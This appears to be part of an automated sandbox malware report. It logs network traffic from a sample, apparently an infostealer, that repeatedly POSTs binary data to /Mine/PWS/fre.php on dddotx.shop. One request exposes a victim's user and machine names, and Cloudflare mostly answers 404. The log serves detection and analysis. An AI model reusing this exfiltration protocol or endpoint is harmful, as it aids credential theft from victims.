Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00404ED4 recv,

2_2_00404ED4

Source: global traffic

DNS traffic detected: DNS query: dddotx.shop

Source: unknown

HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 192Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9t8yz2U2irZoq6Uw3dUjkj78ZEXgG8MnmB9xALizVpWkR%2Fm9vqAsd%2FGudhHg2amd1h76Hv%2FFQ3maCR8loEfHWWrsPf2IzBdgKhiO1TM8W2S4SmEKHdvu4rhyEu%2BxBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89966aded28ce8-EWRData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B2H2c0Gj2uWvet4ViqNJLX2Yk7vZoWpp7RzdBTI8kZBYwxHhoRCOudl3VT3vT0IFa8M5zwG07SPzAGiDhFJbHQVp%2BXVJFYW2UtP2E5aTuCCA2OJPUz%2BiNx1gjG%2Bzcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89967168f01a0f-EWRalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2OvSeZZQTmhd75P2XTmwZYodU%2Bl68iqvjz7NIeIFz1rA76YgN73SvxxXjb1%2B15DmR1rjbTH9rRfbWNKCSPsrPjr5uUQWgjwaan7Mn11nDQzivaZQUC8W95fghiLug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996767a458cb4-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlhK6sP%2FjGiccxN5WqbMJ7FBrFLcskipZJsHQypob8lx8mwY94fXCU0%2Bzg0m9JyL9WInxHL8HL%2FIcG6YpXj5nDlfdi0TvjpZNJA7v6GW53X%2BhJzRWdkQC9AOWKDkTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89967c1fbe43d9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boOSk5iX75iAUOyBOaaWNADScZnIR3oD4BhEaYPKDT5WwvpMQuGiaECNRY4r049k18b7jnIy6akaSEC1DxCWQmvfEQKE%2B9hkM7hsww5HvAYbPxF1gQh%2F08Q3%2BgfIYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899681aa685e5f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trQiPC%2BfoJTo3Hf42NuVPNFZ2GNtT6TX6AIXzO021oL5tY3Lf1N3vmKdctmyeuZwnHk0m01wwaI%2FPbVTgXCWYj1JqC0dng4snsXkckUT43xMH2igMHAtVqi3e%2Fcl%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899686cb0f1791-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cmhbUqd%2FywIijoA3eanxHATHUbXNJ5Ze3GMIvAixoBoM3qA%2FHlrXuFWPOiq6MDSiSQwGGUas%2F8TRYTlfGNnbjpxK7KouFFFSiw1Aogsf4jiBKeYZ%2F8SSZxv%2FD9hUg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89968c8eb90cc2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hjf7%2FbhQDeW6ZKrU5IhE4S3b8rSFr22eXuOErInXDBXVF1vNV3S859ZlrN6LeNF%2BShs5Eniv5%2BkKTQf7iV7T0BZNSBzuFeZY8fAgQrKEfwgSj%2BN3zXz7lwR%2FztHs9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89969389c70f5b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHAGU87e5ScF5VKOzXAOGbSh%2Fv0%2BC3b88kNJGrDL%2B%2FYP%2BCefGKZC6HQrhY%2BMBAVaCJCmPPvQOXZ18gp6aZWKFXwd1GwCby9clYUWmbSHi5hAkYZOsVRLmljJXBX1bA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899698de2b5e6d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8QNSisiSVEqhsk6TCyoGssnRvviWJUo9jzDFmiQm4VI28HHBgYV0vYYMShDkhYNJJVb6E8f6yZOg2qgKRjkF17BC5dCBiIQ36FRa2FZRqcgpVmssGNk2A9KKQ1CXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89969dd9e4431a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BOSV1q19agfRAcyOSr3G8U%2BwoyB8cgCXCChrISMMVo845%2Bag6s6tNHAVP8k6Gph9wJf1Ppc8pabXj2SFCiU9xvpcUzlsPNNIqAmtaFjUlml08%2FR%2BZttYl%2BNhDascQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996a2deb043dd-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BOSV1q19agfRAcyOSr3G8U%2BwoyB8cgCXCChrISMMVo845%2Bag6s6tNHAVP8k6Gph9wJf1Ppc8pabXj2SFCiU9xvpcUzlsPNNIqAmtaFjUlml08%2FR%2BZttYl%2BNhDascQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996a2deb043dd-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03BLncS52vpJEz1WmD%2BLPQ9t97y29aDADLRNppBZesIOedKbpGF3mpYFoickwpiFSIGSpiVgIKiYvX5FpkwIpoiyclDx5RgO0VKa2UncvkFbJ1ECLtf1AES7wT0qiw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996a9eeba4319-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iuyt4sVbpw5v7D8MRS4CpKTyIh9kMv8R8bEhoqf9Sc7SaHYxg1XWLFkdDk7HxcvGV%2BtLLZQTgr2RbCLHi3QlChNz0IQEAP91q0VwW0fht4kRnYyFfvMEhiKchpY1pw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996af2d5c7292-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=przmNtHt17QidHH1WoXo5RRVUv7HWNlmaIYCtvS%2BbUHR8XjEGwfebNnwepPJjMoPToSTfe7PbIPPharL1ajJnVZ2glsmcXP%2BHN1c3YTGb83cUhdGnXFrrt9wF5tNMw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996b528d58cdc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QgCVXj7RNA514KYbr%2BwUa%2BoK0SASz7gyoS3HxtTGjWWUrzgSq5IhiXSYvFZQZqA4Bhuhxo7WhImHscO4kj2WQ3jOvG0FSvEV%2BK5eh2X0rapu%2FzsBpyN7w8nm%2F%2FsMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996bb0c387d06-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AAybTIgOuUxx7QPzV%2B87h6QxSjxBTdSBgErwND8sNgMOvLLNA4ZTjKWQy1MVfWsy9SM95W6FgE9w%2FMdUuhGznlpnmHFazXQ661H1SLTOjTY5EaCl2vHPsMjajw%2FmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996c00f91c334-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=maqvNCmgSwqA2O7i62KLiBuc7DqBxStg5Y%2Ffan4JJxh9IsWq%2Fm%2B6kDO3bvlCjthk60vmL31PeK%2FeZQBpO9GHbGg42%2BWoRcNv1W4Zvh6fTAjL%2Fcuo8LwKeBgvcmj6rA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996c6591a8c5f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1JoKrr7RhHAcpEe2cIYu5MWlyXZ6HS1JJtDy5m%2Fsrf%2B2aA1k0%2Bo0XoarJsZAKkRge0XXh62ZwPrbp1qINoihMUOlaNg4LF6PsYEaJe7cDIRipgD11gcv%2BHLmiG0jg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996cb6f104401-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZ2uo4MS5haEFosad9DwHaAfIJP%2B9jPM1Cj4YkThGFemLImngDuXKlgfVe4vRiD5kTvw1PAOt6JHEDvWsvKDwqAqI35yC%2FembVxVhudmg1e6euqs0XPk13ES4XugDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996d10e290ca2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Xkta2U3QnLTgQhBitM61NxDRFKQNUwbsyMpWsX7tdzdkGpuo8YbGk2KkWGJtMBUPUrB1FjXVKY7DE%2BuMG8wnQhhvwpVVW0wbT3XTOWQBO4xVOo4uOImjw6jhR%2BruQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996d67c038c60-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRkENZEDwOcPzD62L4S7Gg4KDUpucGpdy4xNGyJoqEPX%2FOdANorPqjHQv5z4JgNB0Nzz7s3Pmey1HJ8oWwLrJuk7gdwZmFVKcxnlYJCpI5CkSAU9ksvvGv2hlyozXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996e1d83b424a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fvbXnmF9JsaSZMr0T%2B8mojQtqU91k2MfExJUFwLNUqGGeMJBYJemVH0qK6bjvGtA6kfOp3kfE%2B7Ykwn6uz5lRISD5aHZkf5bK9DGrOdBqDTzSyUw5nTBWn%2B2KRCsTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996e7ba494349-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ph4jvZ6wd3aVkAH%2BqVmYUVFZZxodfJmAaTv72TJBljn8HDSRVgnNsuQObOsBys7CzVCAc4cjnoVTUISIatbNYSouD%2F0MLK4NMGWcRKdvFBNSHDbg65y7auLOSKiLUA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996ecfe6b1871-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
